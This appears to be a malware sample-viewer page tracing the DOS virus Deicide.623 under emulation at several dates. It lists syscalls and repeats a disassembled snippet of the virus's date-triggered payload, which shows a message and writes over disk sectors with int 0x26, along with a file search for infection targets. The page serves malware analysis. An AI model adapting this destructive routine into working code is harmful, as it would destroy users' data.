Sample viewer

vx.netlux.org/Virus.DOS.Deicide.623

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:57:07.835327295Z	42	PC: 12a52 \| Get date 0x12a52: cmp dh, 8 0x12a55: jb 0x12a7b 0x12a57: cmp dh, 8 0x12a5a: jg 0x12a7b 0x12a5c: cmp dl, 3 0x12a5f: jb 0x12a7b 0x12a61: cmp dl, 0x12 0x12a64: jg 0x12a7b 0x12a66: mov ah, 9 0x12a68: mov dx, 0x23c 0x12a6b: int 0x21 0x12a6d: int 0x20 0x12a6f: mov al, 2 0x12a71: mov cx, 0x50 0x12a74: mov dx, 0 0x12a77: int 0x26 0x12a79: jmp 0x12a79 0x12a7b: mov ax, word ptr [0x2b3] 0x12a7e: mov word ptr [0x2af], ax 0x12a81: mov bx, word ptr [0x2b5]
2018-12-17T22:57:07.838128936Z	26	PC: 12a90 \| Set disk transfer address
2018-12-17T22:57:07.839212861Z	78	PC: 12a9a \| Find first file
2018-12-17T22:57:07.844835528Z	79	PC: 12ade \| Find next file
2018-12-17T22:57:07.847802093Z	79	PC: 12ade \| Find next file
2018-12-17T22:57:07.850256258Z	79	PC: 12ade \| Find next file
2018-12-17T22:57:07.852783911Z	79	PC: 12ade \| Find next file
2018-12-17T22:57:07.855985914Z	79	PC: 12ade \| Find next file
2018-12-17T22:57:07.858550118Z	79	PC: 12ade \| Find next file
2018-12-17T22:57:07.861037008Z	79	PC: 12ade \| Find next file
2018-12-17T22:57:07.864161243Z	79	PC: 12ade \| Find next file
2018-12-17T22:57:07.866450832Z	26	PC: 12b77 \| Set disk transfer address

{"DateBased":true,"Day":3,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12447,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:32:58.442934672Z	42	PC: 12a52 \| Get date 0x12a52: cmp dh, 8 0x12a55: jb 0x12a7b 0x12a57: cmp dh, 8 0x12a5a: jg 0x12a7b 0x12a5c: cmp dl, 3 0x12a5f: jb 0x12a7b 0x12a61: cmp dl, 0x12 0x12a64: jg 0x12a7b 0x12a66: mov ah, 9 0x12a68: mov dx, 0x23c 0x12a6b: int 0x21 0x12a6d: int 0x20 0x12a6f: mov al, 2 0x12a71: mov cx, 0x50 0x12a74: mov dx, 0 0x12a77: int 0x26 0x12a79: jmp 0x12a79 0x12a7b: mov ax, word ptr [0x2b3] 0x12a7e: mov word ptr [0x2af], ax 0x12a81: mov bx, word ptr [0x2b5]
2018-12-25T12:32:58.446062275Z	9	PC: 12a6d \| Display string (String= ' This Personal Computer has been struck by the uncurable disease that is called "The Doom of Morgoth". ')

{"DateBased":true,"Day":19,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12447,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:32:58.530793655Z	42	PC: 12a52 \| Get date 0x12a52: cmp dh, 8 0x12a55: jb 0x12a7b 0x12a57: cmp dh, 8 0x12a5a: jg 0x12a7b 0x12a5c: cmp dl, 3 0x12a5f: jb 0x12a7b 0x12a61: cmp dl, 0x12 0x12a64: jg 0x12a7b 0x12a66: mov ah, 9 0x12a68: mov dx, 0x23c 0x12a6b: int 0x21 0x12a6d: int 0x20 0x12a6f: mov al, 2 0x12a71: mov cx, 0x50 0x12a74: mov dx, 0 0x12a77: int 0x26 0x12a79: jmp 0x12a79 0x12a7b: mov ax, word ptr [0x2b3] 0x12a7e: mov word ptr [0x2af], ax 0x12a81: mov bx, word ptr [0x2b5]
2018-12-25T12:32:58.553337488Z	26	PC: 12a90 \| Set disk transfer address
2018-12-25T12:32:58.555140793Z	78	PC: 12a9a \| Find first file
2018-12-25T12:32:58.562526179Z	79	PC: 12ade \| Find next file
2018-12-25T12:32:58.565545854Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.572070121Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.576210633Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.57945129Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.583785718Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.586717964Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.589604446Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.593187031Z	26	PC: 12b77 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12447,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:32:58.693615554Z	42	PC: 12a52 \| Get date 0x12a52: cmp dh, 8 0x12a55: jb 0x12a7b 0x12a57: cmp dh, 8 0x12a5a: jg 0x12a7b 0x12a5c: cmp dl, 3 0x12a5f: jb 0x12a7b 0x12a61: cmp dl, 0x12 0x12a64: jg 0x12a7b 0x12a66: mov ah, 9 0x12a68: mov dx, 0x23c 0x12a6b: int 0x21 0x12a6d: int 0x20 0x12a6f: mov al, 2 0x12a71: mov cx, 0x50 0x12a74: mov dx, 0 0x12a77: int 0x26 0x12a79: jmp 0x12a79 0x12a7b: mov ax, word ptr [0x2b3] 0x12a7e: mov word ptr [0x2af], ax 0x12a81: mov bx, word ptr [0x2b5]
2018-12-25T12:32:58.696648863Z	26	PC: 12a90 \| Set disk transfer address
2018-12-25T12:32:58.698222682Z	78	PC: 12a9a \| Find first file
2018-12-25T12:32:58.704368549Z	79	PC: 12ade \| Find next file
2018-12-25T12:32:58.708143234Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.710903518Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.713652244Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.716349113Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.719719904Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.722460474Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.725110898Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.734965511Z	26	PC: 12b77 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12447,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:32:58.754117093Z	42	PC: 12a52 \| Get date 0x12a52: cmp dh, 8 0x12a55: jb 0x12a7b 0x12a57: cmp dh, 8 0x12a5a: jg 0x12a7b 0x12a5c: cmp dl, 3 0x12a5f: jb 0x12a7b 0x12a61: cmp dl, 0x12 0x12a64: jg 0x12a7b 0x12a66: mov ah, 9 0x12a68: mov dx, 0x23c 0x12a6b: int 0x21 0x12a6d: int 0x20 0x12a6f: mov al, 2 0x12a71: mov cx, 0x50 0x12a74: mov dx, 0 0x12a77: int 0x26 0x12a79: jmp 0x12a79 0x12a7b: mov ax, word ptr [0x2b3] 0x12a7e: mov word ptr [0x2af], ax 0x12a81: mov bx, word ptr [0x2b5]
2018-12-25T12:32:58.770231592Z	26	PC: 12a90 \| Set disk transfer address
2018-12-25T12:32:58.771589753Z	78	PC: 12a9a \| Find first file
2018-12-25T12:32:58.784683288Z	79	PC: 12ade \| Find next file
2018-12-25T12:32:58.79292393Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.796041302Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.799221531Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.803357107Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.806601132Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.809738404Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.812875862Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.816258668Z	26	PC: 12b77 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12447,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:32:58.821179722Z	42	PC: 12a52 \| Get date 0x12a52: cmp dh, 8 0x12a55: jb 0x12a7b 0x12a57: cmp dh, 8 0x12a5a: jg 0x12a7b 0x12a5c: cmp dl, 3 0x12a5f: jb 0x12a7b 0x12a61: cmp dl, 0x12 0x12a64: jg 0x12a7b 0x12a66: mov ah, 9 0x12a68: mov dx, 0x23c 0x12a6b: int 0x21 0x12a6d: int 0x20 0x12a6f: mov al, 2 0x12a71: mov cx, 0x50 0x12a74: mov dx, 0 0x12a77: int 0x26 0x12a79: jmp 0x12a79 0x12a7b: mov ax, word ptr [0x2b3] 0x12a7e: mov word ptr [0x2af], ax 0x12a81: mov bx, word ptr [0x2b5]
2018-12-25T12:32:58.823612636Z	26	PC: 12a90 \| Set disk transfer address
2018-12-25T12:32:58.832152608Z	78	PC: 12a9a \| Find first file
2018-12-25T12:32:58.838582734Z	79	PC: 12ade \| Find next file
2018-12-25T12:32:58.841073947Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.844267173Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.847120412Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.849849615Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.853404696Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.856341741Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.858983559Z	79	PC: 12ade \| Find next file (See above)
2018-12-25T12:32:58.861436071Z	26	PC: 12b77 \| Set disk transfer address